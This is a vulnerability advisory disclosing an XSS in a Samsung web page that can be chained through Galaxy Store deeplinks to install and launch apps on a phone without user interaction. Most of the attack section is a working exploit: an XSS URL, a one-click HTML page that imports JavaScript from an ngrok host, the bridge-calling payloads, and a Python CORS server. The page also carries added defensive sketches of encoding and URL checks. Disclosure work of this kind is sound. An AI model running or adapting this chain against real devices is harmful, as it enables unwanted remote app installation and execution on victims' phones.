SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction

TL;DR

A vulnerability in the Galaxy Store lets attackers use an XSS to make the store install and/or launch an application, allowing remote attackers to trigger remote command execution on the phone.

Vulnerability Summary

The Galaxy Store application handles a number of deeplinks. A deeplink can be called from another application or from a browser. When it receives a suitable deeplink, Galaxy Store processes it and displays the result in a WebView.

Because the deeplink is not checked securely, when a user follows a link on a website that contains the deeplink, the attacker can execute JS code in the WebView context of the Galaxy Store application.

Credit

An independent security researcher has reported this to the SSD Secure Disclosure program.

Affected Versions

Galaxy Store version 4.5.32.4

Technical Analysis

First, we look at the Samsung MCS Direct Page website: https://us.mcsvc.samsung.com/mcp25/devops/redirect.html

When we access the website, it will look like this:

However, if you reverse the Galaxy Store app, you find that the following parameters are needed: mcs_ru and testMode. Here is the MCS site result with those parameters:

We can see that it contains the content of intents, not yet turned into deeplinks, that are to be sent to Samsung's applications for processing, such as Samsung Pay, Bixby, Samsungapp, Gamelauncher, …

Pay attention here to the deeplinks sent to Samsungapp. Here is an example:
samsungapps://MCSLaunch?action=each_event&url={{url}}

When this deeplink is sent, the Galaxy Store handles it as follows:

  1. The app checks the deeplink for the string samsungapps
  2. If the string MCSLaunch is present, the app proceeds with the MCS WebView process
  3. Finally, it takes the url parameter and loads it with WebView.loadUrl

There is one interesting thing here. We return to the Samsung MCS Direct Page website. This website parses the parameters from the URL and then displays them on the page, but it does not encode them, leading to an XSS error as follows:

We can see the website processing the abc and def parameters and displaying them as above without encoding. The URL is passed directly to href, which is very dangerous and causes XSS.

A proof of concept would be as simple as:
https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a&testMode=1&%22id=%22%3Ca%20id%3d%22%3E%3Csvg/onload%3dalert(1)%3E%22%3E

Well, it's a basic error, and exploiting it is simple.

Now we combine it with the Galaxy Store. We look at the code that processes the deeplink and displays it in the WebView:
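
As an added illustration (not code from the MCS page or from the advisory's author), the sketch below models a page that writes its query parameters into links, first without encoding and then with HTML escaping and an http(s)-only href check. The function names and the markup shape are assumptions; the query string is the one from the proof-of-concept URL above.

```javascript
// Added example: constructed model of a page that lists its query parameters.
// escapeHtml, safeHref, renderUnsafe and renderSafe are hypothetical names.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Only http(s) URLs may be placed in href; anything else becomes an inert "#".
function safeHref(value) {
  try {
    const u = new URL(value);
    return u.protocol === "https:" || u.protocol === "http:" ? u.href : "#";
  } catch {
    return "#";
  }
}

// Vulnerable pattern: decoded names and values are concatenated into markup.
function renderUnsafe(query) {
  let html = "";
  for (const [name, value] of new URLSearchParams(query)) {
    html += '<a id="' + name + '" href="' + value + '">' + name + "</a>\n";
  }
  return html;
}

// Hardened pattern: every decoded string is encoded for its HTML context.
function renderSafe(query) {
  let html = "";
  for (const [name, value] of new URLSearchParams(query)) {
    html += '<a id="' + escapeHtml(name) + '" href="' + escapeHtml(safeHref(value)) +
            '">' + escapeHtml(name) + "</a>\n";
  }
  return html;
}

// Query string taken from the proof-of-concept URL on this page.
const POC_QUERY =
  "mcs_ru=a&testMode=1&%22id=%22%3Ca%20id%3d%22%3E%3Csvg/onload%3dalert(1)%3E%22%3E";

console.log(renderUnsafe(POC_QUERY)); // the svg element survives as live markup
console.log(renderSafe(POC_QUERY));   // the same input is rendered as inert text
```
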

webSettings.setJavaScriptEnabled(true); // allow JS execution
webSettings.setJavaScriptCanOpenWindowsAutomatically(true);
WebView webView = this.c;
webView.addJavascriptInterface(new McsWebBridge(this, webView, new McsWebBridgeProvider()), "McsBridge");
WebView webView2 = this.c;
webView2.addJavascriptInterface(new McsWebBridge(this, webView2, new GmpWebBridgeProvider()), "GmpBridge");
this.l = new EditorialScriptInterface(this, this.c);
this.c.addJavascriptInterface(this.l, "GalaxyStore"); // add JS interface so that JS can call functions defined in Java class.

We observe the class EditorialScriptInterface:

@JavascriptInterface
public void downloadApp(String str){...}
@JavascriptInterface
public void openApp(String str) {...}

We notice the two functions downloadApp and openApp here. These two functions take the app id and download the app from the store or open it, so we can use JS code to call them. The POC is as simple as this:

window.GalaxyStore.openApp("com.sec.android.app.popupcalculator"); // Open app calc
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");// Download app calc
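
The following added example (a JavaScript model, not Galaxy Store code and not the vendor's patch) replays the three handler steps with a URL check before the load and a confirmation gate on the bridge methods. The allowlisted host, the function names and the confirmation flag are assumptions. The deeplink from this advisory's proof-of-concept page still passes the URL check, because the XSS sits on the allowlisted host, which is why the bridge gate is needed as a second layer.

```javascript
// Added example: model of the handler steps with defensive checks.
// All names here are hypothetical.
const TRUSTED_HOSTS = new Set(["us.mcsvc.samsung.com"]); // assumption: host seen in the PoC
const CONFIRM_REQUIRED = new Set(["downloadApp", "openApp"]); // bridge methods named on the page

// Steps 1-3: scheme check, MCSLaunch check, extraction of the url parameter.
function extractMcsUrl(deeplink) {
  let link;
  try { link = new URL(deeplink); } catch { return null; }
  if (link.protocol !== "samsungapps:") return null;
  if (link.hostname.toLowerCase() !== "mcslaunch") return null;
  return link.searchParams.get("url"); // null when the parameter is absent
}

// Check that belongs between step 3 and the loadUrl call.
function checkTarget(target) {
  let u;
  try { u = new URL(target); } catch { return "reject: unparseable url"; }
  if (u.protocol !== "https:") return "reject: not https";
  if (u.username || u.password) return "reject: userinfo in url";
  if (!TRUSTED_HOSTS.has(u.hostname)) return "reject: host not allowlisted";
  return "load";
}

function decideDeeplink(deeplink) {
  const target = extractMcsUrl(deeplink);
  return target === null ? "reject: not an MCSLaunch deeplink with url" : checkTarget(target);
}

// Second layer: script on an allowlisted page still cannot install or launch
// anything unless the user confirmed the action in native UI.
function allowBridgeCall(method, userConfirmed) {
  return !CONFIRM_REQUIRED.has(method) || userConfirmed === true;
}

// Deeplink from the proof-of-concept page in this advisory (placeholder host as published).
const POC_DEEPLINK = "samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://xxxxxx.ngrok.io/open.js%27)%3e%22%3e";
// Constructed sample: trusted name placed in the userinfo part of the URL.
const USERINFO_DEEPLINK = "samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com@example.invalid/";

console.log(decideDeeplink(POC_DEEPLINK));      // host check alone does not stop the chain
console.log(decideDeeplink(USERINFO_DEEPLINK)); // rejected before any load
console.log(allowBridgeCall("downloadApp", false));
```
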

Proof of concept

We will design a simple website like this:

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  </head>
  <body>
    <a href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://xxxxxx.ngrok.io/open.js%27)%3e%22%3e">1 click</a>
  </body>
</html>

The file open.js will open the calc app.

The file download.js will download the calc app.

The file down_and_open.js will download and then open the calc app.

To exploit this successfully, the victim's server needs HTTPS and a bypass of Chrome's CORS restrictions. We use Python and ngrok for the setup.

The steps are as follows:

  1. Run the file https.py to bypass CORS and open a server on port 8000
  2. Run ngrok.exe http 8000
  3. On a Samsung device, use Chrome to access the victim server and click on the link.

Vendor Response

The vendor has issued patches which are now in wide circulation for all Samsung devices.

Exploit

// down_and_open.js
function testCallBack(){
    setTimeout(()=>{
        window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");
    },20000);
    window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");
}

testCallBack();

// download.js
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");

#!/usr/bin/python3
# https.py
import os
import sys
import http.server
import socketserver

PORT = 8000


class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        http.server.SimpleHTTPRequestHandler.end_headers(self)


def server(port):
    httpd = socketserver.TCPServer(('', port), HTTPRequestHandler)
    return httpd


if __name__ == "__main__":
    port = PORT
    httpd = server(port)
    try:
        # os.chdir('build')
        print("\nserving from build/ at localhost:" + str(port))
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("\n...shutting down http server")
        httpd.shutdown()
        sys.exit()

<!-- index.html -->
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
  </head>
  <body>
    <a
      href="samsungapps://MCSLaunch?action=each_event&amp;url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://cf89a4eb207f.ngrok.io/down_and_open.js%27)%3e%22%3e"
      >1 click</a
    >
  </body>
</html>

// open.js
window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");
